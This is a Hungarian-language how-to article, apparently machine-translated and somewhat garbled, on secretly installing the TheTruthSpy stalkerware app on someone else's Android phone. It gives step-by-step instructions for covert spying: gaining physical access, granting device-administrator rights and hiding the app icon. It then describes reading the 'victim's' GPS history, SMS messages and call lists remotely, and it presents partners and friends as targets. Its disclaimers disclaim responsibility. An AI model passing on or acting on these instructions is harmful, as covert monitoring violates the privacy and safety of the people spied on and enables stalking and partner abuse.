hogyan lehet egyszerűen megérinteni mások Android-telefonjait

Szeretné tudni, hogyan érintse meg valaki más androidos telefonját? Így koppinthat valaki más androidos telefonjára! Kérjük, olvassa el!

Gyanakodik azokról a tevékenységekről, amelyeket barátai vagy barátnői végeznek az Androidon? Vagy szülő vagy, aki meg akarja ismerni gyermekeik mindennapjait?

Nyugi, van rá módunk, hogy titokban, anélkül, hogy bárki tudatában lenne, rögzítheti valaki mobiljának minden tevékenységét.

Ez a módszer meglehetősen egyszerű, de fizikai hozzáféréssel kell rendelkeznie annak a személynek az okostelefonjához, akit megérinteni szeretne. Így lehet titokban koppintani mások Android-telefonjain.

Legyen óvatos, emlékeztetnünk kell arra, hogy ne használja ezeket a tippeket olyan tevékenységekhez, amelyek károsak lehetnek bizonyos személyekre vagy felekre. Minden, ami végül egy párt számára káros, végül nem a mi felelősségünk.

  • 2016. UPDATE: Hacker trükkök gyűjteménye gyökér nélküli Androidhoz
  • 10 Android titkos kód, amelyet ismernie kell
  • Ez a világ 10 legveszélyesebb hackere (Psst .. Vannak indonéz hackerek, tudod)

Lépések a mások Android-telefonjainak megérintésére

  • Először szüksége van egy alkalmazásra TheTruthSpy. Töltse le és telepítse az alkalmazást a következőn keresztül: link a következő.
Termelékenységi alkalmazások Az igazság kém LETÖLTÉS
  • Ha igen, nyissa meg az alkalmazást, és a gomb segítségével hozzon létre új fiókot Új fiók regisztrálása. Írja be e-mail címét és jelszavát, majd nyomja meg az gombot Fiók létrehozása.

  • Oldal Eszközadminisztrátor megnyílik. nyomja meg Aktiválja hogy aktiválja.

  • Most az alkalmazás használatra kész. Az alkalmazást telepítő okostelefonról minden adat feltöltésre kerül a TheTruthSpy webhelyre. Ha el akarja távolítani a TheTruthSpy alkalmazás ikont az áldozat mobiltelefonjáról, csak egy gombot kell megnyomnia Konfiguráció, és válassza A TheTruthSpy ikon elrejtése.

  • Ha meg szeretné tekinteni, hogy az alkalmazás milyen adatokat kapott, egyszerűen nyissa meg a my.thetruthspy.com webet, írja be a korábban regisztrált e-mail címet és jelszót.

  • A normál verzió esetében csak a szolgáltatáson keresztül nyerhet ki adatokat az áldozat tartózkodási helyéről GPS előzmények, listázza az SMS-eket, Híváslista, és Automatikus válasz. A Premium és a Gold csomagok révén teljesebb funkciók érhetők el, a csomagtól függően különböző költségekkel.

  • Ban,-ben SMS előzmények, láthatja az összes SMS-t az áldozat mobiltelefonjának postaládájában

  • Oszlopokon keresztül is megkaphatja ugyanazt Híváslista. Odabent van egy egész lista bejövő és kimenő hívások az áldozattól.

Ezért a mások Android telefonjainak egyszerű megérintésével kapcsolatos cikkben ismét hangsúlyozzuk és emlékeztetjük, hogy ne használja ezt a módszert olyan tevékenységekre, amelyek bizonyos személyeket vagy feleket károsítanak. Azok a dolgok, amelyek végül károsak lehetnek ezekre a pártokra, nem a mi felelősségünk.


$config[zx-auto] not found$config[zx-overlay] not found